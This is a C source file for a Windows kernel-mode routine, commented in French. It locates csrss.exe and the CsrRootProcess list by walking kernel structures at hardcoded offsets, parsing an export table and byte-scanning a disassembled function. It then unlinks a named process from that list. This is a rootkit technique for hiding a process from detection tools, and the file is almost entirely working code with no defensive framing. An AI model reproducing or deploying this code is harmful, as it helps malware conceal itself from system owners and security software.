UnlinkInCrss - Ring0.cpp

/*
.text:75AD52D3                         _CsrLockProcessByClientId@8 proc near   ; CODE XREF: CsrCreateRemoteThread(x,x)+2Fp
.text:75AD52D3
.text:75AD52D3                         arg_0           = dword ptr  8
.text:75AD52D3                         arg_4           = dword ptr  0Ch
.text:75AD52D3
.text:75AD52D3 8B FF                                   mov     edi, edi
.text:75AD52D5 55                                      push    ebp
.text:75AD52D6 8B EC                                   mov     ebp, esp
.text:75AD52D8 53                                      push    ebx
.text:75AD52D9 56                                      push    esi
.text:75AD52DA 57                                      push    edi
.text:75AD52DB BF A0 89 AD 75                          mov     edi, offset _CsrProcessStructureLock
.text:75AD52E0 57                                      push    edi
.text:75AD52E1 FF 15 18 11 AD 75                       call    ds:__imp__RtlEnterCriticalSection@4 ; RtlEnterCriticalSection(x)
.text:75AD52E7 8B 55 0C                                mov     edx, [ebp+arg_4]
.text:75AD52EA 83 22 00                                and     dword ptr [edx], 0
.text:75AD52ED 8B 35 1C 89 AD 75                       mov     esi, _CsrRootProcess <-
.text:75AD52F3 83 C6 08                                add     esi, 8
.text:75AD52F6 C7 45 0C 01 00 00 C0                    mov     [ebp+arg_4], 0C0000001h
.text:75AD52FD 8B CE                                   mov     ecx, esi
*/

int unlinkInCsrss(char* processus)
{
    PEPROCESS                pEprocessCourante;
    PLIST_ENTRY              lcCourante;
    LIST_ENTRY               lEntry;
    ULONG                    valeurDebut;
    KAPC_STATE               kApcState;
    PUCHAR                   pPeb , pPebLdr , pPebLdrEntry , imgBaseCsrsrv , name , CsrLockProcessByClientId , CsrRootProcess;
    PIMAGE_DOS_HEADER        pImgDosHeader;
    PIMAGE_NT_HEADERS        pImgNtHeader;
    PIMAGE_EXPORT_DIRECTORY  pImgExportDirectory;
    PULONG                   rvaNameTable , rvaAdressTable;
    int                     i;
    PCSR_PROCESS            pCsrProcess;

    imgBaseCsrsrv            = NULL;
    CsrLockProcessByClientId = NULL;
    pEprocessCourante        = IoGetCurrentProcess();
    valeurDebut              = (ULONG)pEprocessCourante;
    do
    {
        if(strncmp("csrss.exe" , (PUCHAR)pEprocessCourante + 0x174 , strlen(processus)) == 0)
            break;

        lcCourante = (PLIST_ENTRY)((PUCHAR)pEprocessCourante + 0x88);    //   +0x088 ActiveProcessLinks : _LIST_ENTRY
        pEprocessCourante = (PEPROCESS)((PUCHAR)lcCourante->Flink - 0x88);

    }while((ULONG)pEprocessCourante != valeurDebut);

    if((ULONG)pEprocessCourante == valeurDebut)
            return 0;

    KeStackAttachProcess( (PKPROCESS)pEprocessCourante , &kApcState );

    /* Recherche de l'image base de la dll */

    pPeb    = (PUCHAR)*(PULONG)((PUCHAR)pEprocessCourante + 0x1b0);    //   +0x1b0 Peb              : Ptr32 _PEB
    pPebLdr = (PUCHAR)*(PULONG)(pPeb + 0x00c);                         //   +0x00c Ldr              : Ptr32 _PEB_LDR_DATA

    lcCourante        = (PLIST_ENTRY)(pPebLdr+0x00c);                  //+0x00c InLoadOrderModuleList : _LIST_ENTRY
    pPebLdrEntry      = (PUCHAR)lcCourante->Flink;
    valeurDebut       = (ULONG)pPebLdrEntry;
    lcCourante        = (PLIST_ENTRY)lcCourante->Flink;


    //DbgPrint("EPROCESS: %x , PEB : %x." , pEprocessCourante , pPeb);
    while(valeurDebut != (ULONG)lcCourante->Flink)
    {
        //DbgPrint("Module : %ws." , *(PULONG)(pPebLdrEntry+0x024+0x004) );   //+0x024 FullDllName      : _UNICODE_STRING //   +0x004 Buffer           : Ptr32 Uint2B
        if( wcsstr( (wchar_t*)*(PULONG)(pPebLdrEntry+0x024+0x004) , L"CSRSRV.dll" ) != NULL )
        {
            imgBaseCsrsrv = (PUCHAR)*(PULONG)(pPebLdrEntry + 0x018) ;                   //   +0x018 DllBase          : Ptr32 Void
            break;
        }
        pPebLdrEntry = (PUCHAR)lcCourante->Flink;
        lcCourante   = (PLIST_ENTRY)lcCourante->Flink;
    }
    if(imgBaseCsrsrv == NULL)
    {
        KeUnstackDetachProcess( &kApcState );
        return 0;
    }

    //DbgPrint("Image Base Csrsrv.dll : %x." , imgBaseCsrsrv );

    /*                      */
    /* Parcours de son EAT  */

    pImgDosHeader       = (PIMAGE_DOS_HEADER)imgBaseCsrsrv;
    pImgNtHeader        = (PIMAGE_NT_HEADERS)(imgBaseCsrsrv + pImgDosHeader->e_lfanew);
    pImgExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(imgBaseCsrsrv + pImgNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    rvaNameTable   = (PULONG)(imgBaseCsrsrv + pImgExportDirectory->AddressOfNames);
    rvaAdressTable = (PULONG)(imgBaseCsrsrv + pImgExportDirectory->AddressOfFunctions);

    for( i = 0 ; i < (int)pImgExportDirectory->NumberOfFunctions ; i++)
    {
        //DbgPrint("Fonction : %s." , imgBaseCsrsrv + rvaNameTable[i] );
        if( strcmp("CsrLockProcessByClientId" , imgBaseCsrsrv + rvaNameTable[i]) == 0 )
        {
            CsrLockProcessByClientId = imgBaseCsrsrv + rvaAdressTable[i];
            DbgPrint("CsrLockProcessByClientId : %x." , CsrLockProcessByClientId );
            break;
        }
    }
    if( CsrLockProcessByClientId == NULL )
    {
        KeUnstackDetachProcess( &kApcState );
        return 0;
    }

    /*                      */
    /* Scan de la fonction  */

    for( i = 0 ; i < 50 ; i++ )
    {
        if( (*(CsrLockProcessByClientId+i) == 0x83) && (*(CsrLockProcessByClientId+i+1) == 0x22) && (*(CsrLockProcessByClientId+i+2) == 0x00) && (*(CsrLockProcessByClientId+i+3) == 0x8B) && (*(CsrLockProcessByClientId+i+4) == 0x35) &&
            (*(CsrLockProcessByClientId+i+9) == 0x83) && (*(CsrLockProcessByClientId+i+10) == 0xC6) && (*(CsrLockProcessByClientId+i+11) == 0x08) )
            {
                CsrRootProcess = (PUCHAR)*(PULONG)(*(PULONG)(CsrLockProcessByClientId+i+5));
                break;
            }
    }
    if( i == 50 )
    {
        KeUnstackDetachProcess( &kApcState );
        return 0;
    }

    //DbgPrint("CsrRootProcess : %x." , CsrRootProcess);
    pCsrProcess = (PCSR_PROCESS)CsrRootProcess;

    /*                      */
    /* Recherche d'infos sur leprocess a unlinké */

    pEprocessCourante        = IoGetCurrentProcess();
    valeurDebut              = (ULONG)pEprocessCourante;

    do
    {
        if(strncmp(processus , (PUCHAR)pEprocessCourante + 0x174 , strlen(processus)) == 0)
            break;

        lcCourante = (PLIST_ENTRY)((PUCHAR)pEprocessCourante + 0x88);    //   +0x088 ActiveProcessLinks : _LIST_ENTRY
        pEprocessCourante = (PEPROCESS)((PUCHAR)lcCourante->Flink - 0x88);

    }while((ULONG)pEprocessCourante != valeurDebut);

    if((ULONG)pEprocessCourante == valeurDebut)
    {
        KeUnstackDetachProcess( &kApcState );
        return 0;
    }

    /*                      */

    i = 0;

    /* Parcours de la liste */

    lEntry  = pCsrProcess->ListLink;
    valeurDebut = (ULONG)pCsrProcess;
    //DbgPrint("PID : %d." , pCsrProcess->ClientId.UniqueProcess);
    pCsrProcess = (PCSR_PROCESS)((PUCHAR)lEntry.Flink - 0x8);


    while(valeurDebut != (ULONG)pCsrProcess)
    {
        //DbgPrint("PID(%d) : %d." , *(PULONG)((PUCHAR)pEprocessCourante + 0x084) , pCsrProcess->ClientId.UniqueProcess);
        if( (ULONG)pCsrProcess->ClientId.UniqueProcess == *(PULONG)((PUCHAR)pEprocessCourante + 0x084) ) //   +0x084 UniqueProcessId  : Ptr32 Void
        {
            *(PULONG)(pCsrProcess->ListLink.Blink)             =(ULONG) pCsrProcess->ListLink.Flink;
            *(PULONG)((PUCHAR)pCsrProcess->ListLink.Flink + 4) = (ULONG)pCsrProcess->ListLink.Blink;
            i = 1;
        }

        lEntry = *(lEntry.Flink);
        pCsrProcess = (PCSR_PROCESS)((PUCHAR)lEntry.Flink - 0x8);
    }
    if( i == 0 )
    {
        KeUnstackDetachProcess( &kApcState );
        return 0;
    }


    //DbgPrint("Unlink Done.");

    /*                      */

    KeUnstackDetachProcess( &kApcState );
    return 1;
}